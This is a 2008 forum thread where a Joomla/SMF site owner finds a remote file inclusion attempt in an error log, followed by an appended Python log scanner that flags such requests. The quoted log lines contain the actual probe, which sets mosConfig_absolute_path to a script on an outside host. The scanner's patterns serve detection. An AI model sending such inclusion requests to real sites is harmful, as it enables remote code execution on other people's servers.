Hacking attempt?

Started by hefesto, April 15, 2008, 02:37:51 PM

hefesto

I've found this in my error log:

Quote
http://www.mysite.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??

8: Undefined variable: mosConfig_db
File: .../modules/mod_smf_online2.php
Line: 281

http://www.mysite.com/index.php?option=com_smf&Itemid=91&option=com_smf&Itemid=1&mosConfig_absolute_path=http://www.whitsundaychamber.com/id.txt??

8: Undefined variable: moduleclass_sfx
File: .../modules/mod_smf_online2.php
Line: 279

I think it's a code injection attempt using smf-joomla who's online module, am I right? Is there any risk using this module?

I'm using Joomla 1.0.12 with SMF 1.1.4 and bridge 1.1.7

Kindred

you are correct... he is TRYING to hack.

What version of smf_online2 do you have?
Glory to Ukraine

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

hefesto

These are the first lines of my module:

// $Id: mod_smf_online2.php,v 1.8 2006.04.10 Kindred
/**
* @Who is online
* @package smf
* @Copyright (C) 2005 [email protected]
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.8 $
*/


Thanks for the quick reply  ;).

Kindred

you should be fine then...

that version is not affected by the variant hack that the person attempted.

steighan

make sure that you have REGISTER GLOBALS turned off, BOTH at the PHP level, AND in Joomla, which may turn it on internally; otherwise it will work.

Also: you can put a line in your .HTACCESS file to redirect any request that has "http" or attempts to set mosConfig in a url.
"Frequently wrong, but never in doubt"
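
Added example, not part of the thread and not code from the bridge or module discussed: a Python script that applies the check steighan describes (a request that carries "http" in a parameter or tries to set a mosConfig variable) to log lines, so entries like the one quoted in the first post can be picked out of an error or access log. The host names, sample lines and function names are constructed for illustration; the duplicate-parameter check is an extra signal taken from the shape of the logged request.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Joomla 1.0 configuration globals; a client has no reason to send these.
CONFIG_PARAM = re.compile(r"^mosConfig_\w+$", re.IGNORECASE)
# Parameter value that points at a remote resource.
REMOTE_VALUE = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
# First whitespace-free token on a log line that carries a query string.
REQUEST_TOKEN = re.compile(r"\S+\?\S+")

# Constructed sample lines (hypothetical hosts), modelled on the log entry above.
SAMPLE_LINES = [
    "http://forum.example/index.php?option=com_smf&Itemid=91&option=com_smf"
    "&Itemid=1&mosConfig_absolute_path=http://files.example/id.txt??",
    "8: Undefined variable: mosConfig_db",
    "http://forum.example/index.php?option=com_smf&Itemid=91",
    "GET /index.php?mosConfig_absolute_path="
    "http%253A%252F%252Ffiles.example%252Fid.txt HTTP/1.1",
]


def classify_request(url):
    """Return a sorted list of reasons the request looks like an inclusion probe."""
    reasons, seen = set(), set()
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decodes once; catch double encoding
        if CONFIG_PARAM.match(name):
            reasons.add("sets config variable " + name)
        if REMOTE_VALUE.match(value):
            reasons.add("remote URL in parameter " + name)
        if name in seen:
            reasons.add("duplicate parameter " + name)
        seen.add(name)
    return sorted(reasons)


def scan(lines):
    """Return (request, reasons) for every log line that looks suspicious."""
    hits = []
    for line in lines:
        token = REQUEST_TOKEN.search(line)
        reasons = classify_request(token.group(0)) if token else []
        if reasons:
            hits.append((token.group(0), reasons))
    return hits


if __name__ == "__main__":
    for request, reasons in scan(SAMPLE_LINES):
        print(request)
        for reason in reasons:
            print("  -", reason)
```

A legitimate parameter that carries a URL, such as a return address, is flagged by the remote-URL check as well, so review hits before acting on them.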